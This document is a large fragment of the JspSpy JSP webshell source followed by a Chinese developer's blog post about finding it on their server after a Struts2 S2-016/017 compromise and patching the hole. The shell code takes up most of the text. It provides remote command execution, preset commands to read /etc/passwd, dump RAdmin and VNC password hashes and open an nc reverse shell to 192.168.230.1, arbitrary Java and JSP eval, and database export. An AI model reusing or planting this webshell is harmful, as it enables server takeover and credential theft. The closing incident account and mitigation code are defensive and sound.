" <a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> " + " </tr>" + "</table>"); if (JSession.getAttribute(MSG) != null) { Util.outMsg(out, JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } if (JSession.getAttribute(ENTER_MSG) != null) { String outEntry = request.getParameter("outentry"); if (Util.isEmpty(outEntry) || !outEntry.equals("true")) Util.outMsg(out, JSession.getAttribute(ENTER_MSG) .toString()); } } catch (Exception e) { throw e; } } } private static class VOnLineShellInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<script>" + " function $(id) {" + " return document.getElementById(id);" + " }" + " var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;" + " window.onload = function(){" + " setInterval(function(){" + " if ($(\"autoscroll\").checked)" + " {" + " var f = window.frames[\"echo\"];" + " if (f && f.document && f.document.body)" + " {" + " if (!ie)" + " {" + " if (f.document.body.offsetHeight)" + " {" + " f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);" + " }" + " } else {" + " f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);" + " }" + " }" + " }" + " },500);" + " }" + " </script>"); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td>"); out.println("<h2>Shell OnLine »</h2><br/>"); out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">" + " <input type=\"submit\" value=\" start \" class=\"bt\">" + " <input type=\"text\" name=\"exe\" style=\"300px\" class=\"input\" value=\"" + (ISLINUX ? "/bin/bash" : "c:\\windows\\system32\\cmd.exe") + "\"/>" + " <input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>" + " </form>" + " <hr/>" + " <iframe class=\"secho\" name=\"echo\" src=\"\">" + " </iframe>" + " <form action=\"" + SHELL_NAME + "\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">" + " <input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"75%\">" + " <input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>" + " <select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">" + " <option value=\"\" selected> </option>" + " <option value=\"uname -a\">uname -a</option>" + " <option value=\"cat /etc/issue\">issue</option>" + " <option value=\"cat /etc/passwd\">passwd</option>" + " <option value=\"netstat -an\">netstat -an</option>" + " <option value=\"net user\">net user</option>" + " <option value=\"tasklist\">tasklist</option>" + " <option value=\"tasklist /svc\">tasklist /svc</option>" + " <option value=\"net start\">net start</option>" + " <option value=\"net stop policyagent /yes\">net stop</option>" + " <option value=\"nbtstat -A IP\">nbtstat -A</option>" + " <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>" + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>" + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>" + " <option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>" + " <option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>" + " <option value=\"systeminfo\">systeminfo</option>" + " <option value=\"net localgroup\">view groups</option>" + " <option value=\"net localgroup administrators\">view admins</option>" + " </select>" + " <input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll" + " <input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">" + " </form>" + " <iframe style=\"display:none\" name=\"asyn\"></iframe>"); out.println(" </td>" + " </tr>" + "</table>"); } catch (Exception e) { throw e; } } } private static class OnLineInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String type = request.getParameter("type"); if (Util.isEmpty(type)) return; if (type.toLowerCase().equals("start")) { String exe = request.getParameter("exe"); if (Util.isEmpty(exe)) return; Process pro = Runtime.getRuntime().exec(exe); ByteArrayOutputStream outs = new ByteArrayOutputStream(); response.setContentLength(100000000); response.setContentType("text/html;charset=" + System.getProperty("file.encoding")); OnLineProcess olp = new OnLineProcess(pro); JSession.setAttribute(SHELL_ONLINE, olp); new OnLineConnector(new ByteArrayInputStream(outs .toByteArray()), pro.getOutputStream(), "exeOclientR", olp).start(); new OnLineConnector(pro.getInputStream(), response .getOutputStream(), "exeRclientO", olp).start(); new OnLineConnector(pro.getErrorStream(), response .getOutputStream(), "exeRclientO", olp).start(); Thread.sleep(1000 * 60 * 60 * 24); } else if (type.equals("ecmd")) { Object o = JSession.getAttribute(SHELL_ONLINE); String cmd = request.getParameter("cmd"); if (Util.isEmpty(cmd)) return; if (o == null) return; OnLineProcess olp = (OnLineProcess) o; olp.setCmd(cmd); } else { Object o = JSession.getAttribute(SHELL_ONLINE); if (o == null) return; OnLineProcess olp = (OnLineProcess) o; olp.stop(); } } catch (Exception e) { throw e; } } } private static class EnterInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { PrintWriter out = response.getWriter(); String type = request.getParameter("type"); if (!Util.isEmpty(type)) { JSession.removeAttribute(ENTER); JSession.removeAttribute(ENTER_MSG); JSession.removeAttribute(ENTER_CURRENT_DIR); JSession.setAttribute(MSG, "Exit File Success ! "); } else { String f = request.getParameter("filepath"); if (Util.isEmpty(f)) return; JSession.setAttribute(ENTER, f); JSession .setAttribute( ENTER_MSG, "You Are In File <a style='color:red'>\"" + f + "\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>"); } response.sendRedirect(SHELL_NAME); } } private static class VExport2FileInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { PrintWriter out = response.getWriter(); String type = request.getParameter("type"); String sql = request.getParameter("sql"); String table = request.getParameter("table"); if (Util.isEmpty(sql) && Util.isEmpty(table)) { JSession.setAttribute(SESSION_O, "vConn"); response.sendRedirect(SHELL_NAME); return; } out .println("<form action=\"\" method=\"post\">" + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td>" + " <input type=\"hidden\" name=\"o\" value=\"export\"/>" + " <input type=\"hidden\" name=\"type\" value=\"" + (Util.isEmpty(type) ? "" : type) + "\"/>" + " <input type=\"hidden\" name=\"sql\" value=\"" + (Util.isEmpty(sql) ? "" : sql.replaceAll("\"", """)) + "\"/>" + " <input type=\"hidden\" name=\"table\" value=\"" + (Util.isEmpty(table) ? "" : table) + "\"/>" + " <h2>Export To File »</h2>" + " " + " <hr/>Export \"<span style='color:red;font-weight:bold'>" + (Util.isEmpty(sql) ? table : sql.replaceAll("\"", """)) + "</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\"" + (JSession.getAttribute(CURRENT_DIR).toString() + "/exportdata.txt") + "\" size=\"100\" class=\"input\"/>" + " <select name='encode' class='input'><option value=''>ANSI</option><option value='GBK'>GBK</option><option value='UTF-8'>UTF-8</option><option value='ISO-8859-1'>ISO-8859-1</option></select>" + " <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>" + BACK_HREF + "</td>" + " </tr>" + " </table>" + "</form>"); } } private static class ExportInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { String type = request.getParameter("type"); String filepath = request.getParameter("filepath"); String encode = request.getParameter("encode"); String sql = null; DBOperator dbo = null; dbo = (DBOperator) JSession.getAttribute(DBO); if (Util.isEmpty(type)) { //table export String tb = request.getParameter("table"); if (Util.isEmpty(tb)) return; String s = dbo.getConn().getMetaData() .getIdentifierQuoteString(); sql = "select * from " + s + tb + s; } else if (type.equals("queryexp")) { //query export sql = request.getParameter("sql"); if (Util.isEmpty(sql)) { JSession.setAttribute(SESSION_O, "vConn"); response.sendRedirect(SHELL_NAME); return; } } Object o = dbo.execute(sql); ByteArrayOutputStream bout = new ByteArrayOutputStream(); byte[] rowSep = "\r\n".getBytes(); if (o instanceof ResultSet) { ResultSet rs = (ResultSet) o; ResultSetMetaData meta = rs.getMetaData(); int count = meta.getColumnCount(); for (int i = 1; i <= count; i++) { String colName = meta.getColumnName(i) + "\t"; byte[] b = null; if (Util.isEmpty(encode)) b = colName.getBytes(); else b = colName.getBytes(encode); bout.write(b, 0, b.length); } bout.write(rowSep, 0, rowSep.length); while (rs.next()) { for (int i = 1; i <= count; i++) { String v = null; try { v = rs.getString(i); } catch (SQLException ex) { v = "<<Error!>>"; } v += "\t"; byte[] b = null; if (Util.isEmpty(encode)) b = v.getBytes(); else b = v.getBytes(encode); bout.write(b, 0, b.length); } bout.write(rowSep, 0, rowSep.length); } rs.close(); ByteArrayInputStream input = new ByteArrayInputStream(bout .toByteArray()); BufferedOutputStream output = null; if (!Util.isEmpty(filepath)) { //export2file output = new BufferedOutputStream(new FileOutputStream( new File(filepath))); } else { //download. response.setHeader("Content-Disposition", "attachment;filename=DataExport.txt"); output = new BufferedOutputStream(response .getOutputStream()); } byte[] data = new byte[1024]; int len = input.read(data); while (len != -1) { output.write(data, 0, len); len = input.read(data); } bout.close(); input.close(); output.close(); if (!Util.isEmpty(filepath)) { JSession.setAttribute(MSG, "Export To File Success !"); response.sendRedirect(SHELL_NAME); } } } } private static class EvalInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { String type = request.getParameter("type"); PrintWriter out = response.getWriter(); Object msg = JSession.getAttribute(MSG); if (msg != null) { Util.outMsg(out, (String) msg); JSession.removeAttribute(MSG); } if (Util.isEmpty(type)) { out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2>Eval Java Code »</h2>" + "<hr/>" + " <p>" + " <form action=\"" + SHELL_NAME + "?o=eu\" method=\"post\" enctype=\"multipart/form-data\">" + "UpLoad a Class File : "); Util .outMsg( out, "<pre>" + "<span style='color:blue'>public class</span> SpyEval{\r\n" + " <span style='color:blue'>static</span> {\r\n" + " <span style='color:green'>//Your Code Here.</span>\r\n" + " }\r\n" + "}\r\n" + "</pre>", "left"); out .println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>" + " <form action=\"" + SHELL_NAME + "\" method=\"post\"><p></p>Jsp Eval : <br/>" + " <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">" + " <textarea name=\"jspc\" rows=\"15\" cols=\"70\">" + URLDecoder .decode( "%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E", "utf-8") + "</textarea>" + " <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\" />" + " </form>" + " </p>" + " </td>" + " </tr>" + "</table>"); } else if (type.equals("jsp")) { String jspc = request.getParameter("jspc"); if (Util.isEmpty(jspc)) return; File f = new File(SHELL_DIR, "evaltmpninty.jsp"); BufferedWriter writer = new BufferedWriter( new OutputStreamWriter(new FileOutputStream(f), "utf-8")); writer.write(jspc, 0, jspc.length()); writer.flush(); writer.close(); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2>Jsp Eval Result »</h2>"); out .println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">"); request.getRequestDispatcher("evaltmpninty.jsp").include( request, response); out .println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> "); f.delete(); } } } private static class EvalUploadInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { ByteArrayOutputStream stream = new ByteArrayOutputStream(); UploadBean upload = new UploadBean(); upload.setTargetOutput(stream); upload.parseRequest(request); if (stream.toByteArray().length == 2) { JSession.setAttribute(MSG, "Please Upload Your Class File ! "); ((Invoker) ins.get("ev")).invoke(request, response, JSession); return; } SpyClassLoader loader = new SpyClassLoader(); try { Class c = loader.defineClass(null, stream.toByteArray()); c.newInstance(); } catch (Exception e) { } stream.close(); JSession.setAttribute(MSG, "Eval Java Class Done ! "); ((Invoker) ins.get("ev")).invoke(request, response, JSession); } } private static class VOtherInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); Object msg = JSession.getAttribute(MSG); if (msg != null) { Util.outMsg(out, (String) msg); JSession.removeAttribute(MSG); } out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td><h2 id=\"Bin_H2_Title\">Session Manager>></h2><hr/>" + " <div id=\"hOWTm\" style=\"line-height:30px\">" + " <ul>"); Enumeration en = JSession.getAttributeNames(); while (en.hasMoreElements()) { Object o = en.nextElement(); if (o.toString().equals(MSG)) continue; out .println("<li><form action='" + SHELL_NAME + "' method='post'><u>" + o.toString() + "</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\"" + JSession.getAttribute(o.toString()) + "\">"); out .println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>"); out .println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>"); out.println("<input type='hidden' name='name' value='" + o.toString() + "'/>"); out.println("</form></li>"); } out .println("<li style='list-style:none'><form action='" + SHELL_NAME + "' method='post'><fieldset>" + "<legend>New Session Attribute</legend>" + "name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\"" + " name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>" + " </fieldset></form></li></ul></div></td>" + " </tr>" + " </table>"); } catch (Exception e) { throw e; } } } //Session Manager private static class SmInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String type = request.getParameter("type"); PrintWriter out = response.getWriter(); if (type.equals("update")) { String name = request.getParameter("name"); String value = request.getParameter("value"); JSession.setAttribute(name, value); JSession .setAttribute(MSG, "Update/Add Attribute Success !"); } else if (type.equals("delete")) { String name = request.getParameter("name"); JSession.removeAttribute(name); JSession.setAttribute(MSG, "Remove Attribute Success !"); } ((Invoker) ins.get("vother")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } static { ins.put("script", new ScriptInvoker()); ins.put("before", new BeforeInvoker()); ins.put("after", new AfterInvoker()); ins.put("deleteBatch", new DeleteBatchInvoker()); ins.put("clipboard", new ClipBoardInvoker()); ins.put("vPortScan", new VPortScanInvoker()); ins.put("portScan", new PortScanInvoker()); ins.put("vConn", new VConnInvoker()); ins.put("dbc", new DbcInvoker()); ins.put("executesql", new ExecuteSQLInvoker()); ins.put("vLogin", new VLoginInvoker()); ins.put("login", new LoginInvoker()); ins.put("filelist", new FileListInvoker()); ins.put("logout", new LogoutInvoker()); ins.put("upload", new UploadInvoker()); ins.put("copy", new CopyInvoker()); ins.put("bottom", new BottomInvoker()); ins.put("vCreateFile", new VCreateFileInvoker()); ins.put("vEdit", new VEditInvoker()); ins.put("createFile", new CreateFileInvoker()); ins.put("vEditProperty", new VEditPropertyInvoker()); ins.put("editProperty", new EditPropertyInvoker()); ins.put("vs", new VsInvoker()); ins.put("shell", new ShellInvoker()); ins.put("down", new DownInvoker()); ins.put("vd", new VdInvoker()); ins.put("downRemote", new DownRemoteInvoker()); ins.put("index", new IndexInvoker()); ins.put("mkdir", new MkDirInvoker()); ins.put("move", new MoveInvoker()); ins.put("removedir", new RemoveDirInvoker()); ins.put("packBatch", new PackBatchInvoker()); ins.put("pack", new PackInvoker()); ins.put("unpack", new UnPackInvoker()); ins.put("vmp", new VmpInvoker()); ins.put("vbc", new VbcInvoker()); ins.put("backConnect", new BackConnectInvoker()); ins.put("jspEnv", new JspEnvInvoker()); ins.put("smp", new SmpInvoker()); ins.put("mapPort", new MapPortInvoker()); ins.put("top", new TopInvoker()); ins.put("vso", new VOnLineShellInvoker()); ins.put("online", new OnLineInvoker()); ins.put("enter", new EnterInvoker()); ins.put("export", new ExportInvoker()); ins.put("ev", new EvalInvoker()); ins.put("eu", new EvalUploadInvoker()); ins.put("vother", new VOtherInvoker()); ins.put("sm", new SmInvoker()); ins.put("vExport", new VExport2FileInvoker()); ins.put("vPack", new VPackConfigInvoker()); ins.put("reflect", new ReflectInvoker()); ins.put("portBack", new PortBackInvoker()); }%> <% try { String o = request.getParameter("o"); if (Util.isEmpty(o)) { if (session.getAttribute(SESSION_O) == null) o = "index"; else { o = session.getAttribute(SESSION_O).toString(); session.removeAttribute(SESSION_O); } } Object obj = ins.get(o); if (obj == null) { response.sendRedirect(SHELL_NAME); } else { Invoker in = (Invoker) obj; if (in.doBefore()) { String path = request.getParameter("folder"); if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) session.setAttribute(CURRENT_DIR, path); ((Invoker) ins.get("before")).invoke(request, response, session); ((Invoker) ins.get("script")).invoke(request, response, session); ((Invoker) ins.get("top")).invoke(request, response, session); } in.invoke(request, response, session); if (!in.doAfter()) { return; } else { ((Invoker) ins.get("bottom")).invoke(request, response, session); ((Invoker) ins.get("after")).invoke(request, response, session); } } } catch (Exception e) { Object msg = session.getAttribute(MSG); if (msg != null) { Util.outMsg(out, (String) msg); session.removeAttribute(MSG); } if (e.toString().indexOf("ClassCastException") != -1) { Util.outMsg(out, MODIFIED_ERROR + BACK_HREF); } ByteArrayOutputStream bout = new ByteArrayOutputStream(); e.printStackTrace(new PrintStream(bout)); session.setAttribute(CURRENT_DIR, SHELL_DIR); Util.outMsg(out, Util .htmlEncode(new String(bout.toByteArray())).replaceAll( "\n", "<br/>"), "left"); bout.close(); out.flush(); ((Invoker) ins.get("bottom")) .invoke(request, response, session); ((Invoker) ins.get("after")).invoke(request, response, session); } %>
搜索了下关键字JspSpy,找到利用structs2的016 017漏洞能上传文件到服务器。
找了2个利用漏洞的软件进行测试,经过简单的几部操作把文件上传到我们的平台目录下,这...么...简单。以前听说过structs2的漏洞,后来又把.jquery.jsp放上去登录了下,里面有文件操作,数据库操作。看完后,我马上删除了,心里真是谢谢这位上传文件的‘仁兄’,没对我们数据库动手。脑海跑过一万只草泥马。
修复
经总结有3种常用方案。
1、通过修改struts2源码修复
2、升级struts2(容易遇到兼容性问题)
3、重写struts2 DefaultActionMapper的handleSpecialParameters方法,增加action、redirect、redirectAction等参数的过滤。此方法可修补漏洞。
我先选了【2、升级struts2】,可怜我替换了半天的jar包。最后终于编译通过了,运行没问题,晚上10点开始更新代码(为什么10点更新,用户这个时候较少)。- -!听说有热部署,不知道能不能解决我们这种原始的更新部署存在的一些问题,有时间了再学习学习,继续正题。代码更新好,运行测试软件,还是有016 017漏洞。
时间已经10点多了,问题还是要解决的,想想我用软件测试漏洞上传webshell的过程如此so easy,不行必须要解决掉。不能留后患。
发现了第三种解决方法
操作步骤:
1 新建com/website/struts2/MyDefaultActionMapper.java,代码如下:
package com.website.struts2;
import java.util.*;
import javax.servlet.http.HttpServletRequest;
import org.apache.struts2.dispatcher.mapper.ActionMapping;
import org.apache.struts2.dispatcher.mapper.DefaultActionMapper;
import org.apache.struts2.dispatcher.mapper.ParameterAction;
public class MyDefaultActionMapper extends DefaultActionMapper {
public void handleSpecialParameters(HttpServletRequest request, ActionMapping mapping) {
Set uniqueParameters = new HashSet();
Map parameterMap = request.getParameterMap();
for (Iterator iterator = parameterMap.keySet().iterator(); iterator.hasNext();) {
String key = (String) iterator.next();
if ((key.endsWith(".x")) || (key.endsWith(".y"))) {
key = key.substring(0, key.length() - 2);
}
// -- jason.zhou 20130708 add start -- //
if ((key.contains("redirect:")) || (key.contains("redirectAction:")) || (key.contains("action:"))) {
return;
}
// -- jason.zhou 20130708 add end -- //
if (!uniqueParameters.contains(key)) {
ParameterAction parameterAction = (ParameterAction) this.prefixTrie.get(key);
if (parameterAction != null) {
parameterAction.execute(key, mapping);
uniqueParameters.add(key);
break;
}
}
}
}
}
2 用struts.xml添加如下代码:
<!-- 为修复struts2 s2-016、s2-017漏洞,重写DefaultActionMapper --> <bean type="org.apache.struts2.dispatcher.mapper.ActionMapper" name="myDefaultActionMapper" class="com.website.struts2.MyDefaultActionMapper" /> <constant name="struts.mapper.class" value="myDefaultActionMapper" />
上传再测试,ok。
想到这个问题的严重性,决定记录下来。好了不多说了已经0点了。收拾收拾回家。